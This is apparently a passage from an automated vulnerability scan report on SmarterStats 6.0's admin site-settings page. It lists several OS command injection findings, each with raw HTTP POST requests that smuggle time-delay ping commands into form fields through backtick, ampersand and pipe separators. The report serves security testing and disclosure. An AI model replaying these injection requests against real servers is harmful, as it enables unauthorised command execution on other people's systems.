Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30101

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24BPH%24btnSave&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24txtAdminNewUserName_SettingText=weirdo&ctl00%24MPH%24txtAdminNewPassword_SettingText=LL12345%26ping%20-n%2020%20127.0.0.1%26&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=&ctl00_MPH_grdLogLocations_HiddenLSR=&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSetting
s%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__EVENTTARGET=ctl00%24BPH%24btnSave&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[...]&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:04:04 GMT
Content-Length: 0


1.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtSmarterLogDirectory parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24txtSmarterLogDirectory parameter appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time-delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the ctl00%24MPH%24txtSmarterLogDirectory parameter. The application timed out when responding to the request, indicating that the injected command caused a time delay.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 30128

ctl00%24MPH%24txtDefaultDocuments_SettingText=%0d%0aindex.htm%0d%0aindex.html%0d%0adefault.asp%0d%0adefault.aspx&__LASTFOCUS=&ctl00%24MPH%24lstServer_SettingDropDown=1&__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24MPH%24txtSmarterLogDirectory=C%3a%5cSmarterLogs`ping%20-c%2020%20127.0.0.1`&ctl00%24MPH%24lstLogFormat_SettingDropDown=IIS&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24grdLogLocationsCheckAll=on&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=1&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=555-555-0199@example.com&ctl00_MPH_grdSeoStatus_HiddenLSR=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineS
ettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24txtDomainUrl_SettingText=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00%24MPH%24chkStripAfterSemi_SettingCheck=on&ctl00_MPH_grdLogLocations_HiddenInput=&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24txtExportLogDirectory=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24lstStatus_SettingDropDown=paused&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=hoytnet&ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-=on&__VIEWSTATE=[...]&ctl00_MPH_grdLogLocations_HiddenLSR=&ctl00%24MPH%24lstLogLocation_SettingDropDown=FTP

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:26:22 GMT
Content-Length: 0


1.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414 parameter appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time-delay commands to verify the existence of the vulnerability.

The payload %26ping%20-n%2020%20127.0.0.1%26 was submitted in the ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414 parameter. The application timed out when responding to the request, indicating that the injected command caused a time delay.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30101

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24BPH%24btnSave&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24txtAdminNewUserName_SettingText=weirdo&ctl00%24MPH%24txtAdminNewPassword_SettingText=LL12345&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=&ctl00_MPH_grdLogLocations_HiddenLSR=&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckB
ox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on%26ping%20-n%2020%20127.0.0.1%26&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__EVENTTARGET=ctl00%24BPH%24btnSave&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[base64 ViewState omitted]&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:06:07 GMT
Content-Length: 0


1.5. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time-delay commands to verify the existence of the vulnerability.

The payload %26ping%20-n%2020%20127.0.0.1%26 was submitted in the ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter. The application timed out when responding to the request, indicating that the injected command caused a time delay.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30100

ctl00%24ScriptManager1=ctl00%24MPH%24UpdatePanel5%7Cctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTTARGET=ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[base64 ViewState omitted]
cnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2F%2F%2F%2F%2FP%2F%2F%2FwYHAAAABFRleHQKAfj%2F%2F%2F%2F8%2F%2F%2F%2FBgkAAAAKUmVzb3VyY2VJRAYKAAAACEBPcHRpb25zAfX%2F%2F%2F%2F8%2F%2F%2F%2FBgwAAAAIU2VsZWN0ZWQIAQAB8%2F%2F%2F%2F%2Fz%2F%2F%2F8GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtkBRZjdGwwMCRNUEgkZ3JkU2VvU3RhdHVzDwU6VHJ1ZXxUcnVlfHxUcnVlfFRydWV8bGFzdFByb2Nlc3NpbmdEYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGQFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW04DzLaCwABAAAA%2F%2F%2F%2F%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%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAKQFNFT1N0YXR1cwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAADFNFT1N0YXR1c1RhYgtkOM5P3EdqRgSfYoIjJCDTiv3sZp5ktoudiy8rNReMpN8%3D&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24chkS
eoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-&ctl00_MPH_grdLogLocations_HiddenLSR=0&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5%26ping%20-n%2020%20127.0.0.1%26&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_Sett
ingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:32:20 GMT
Content-Length: 0


1.6. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00_MPH_grdLogLocations_HiddenLSR parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00_MPH_grdLogLocations_HiddenLSR parameter appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the ctl00_MPH_grdLogLocations_HiddenLSR parameter. The application timed out when responding to the request, indicating that the injected command caused a time delay.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30100

ctl00%24ScriptManager1=ctl00%24MPH%24UpdatePanel5%7Cctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTTARGET=ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[...]&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-&ctl00_MPH_grdLogLocations_HiddenLSR=0|ping%20-n%2020%20127.0.0.1||x&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24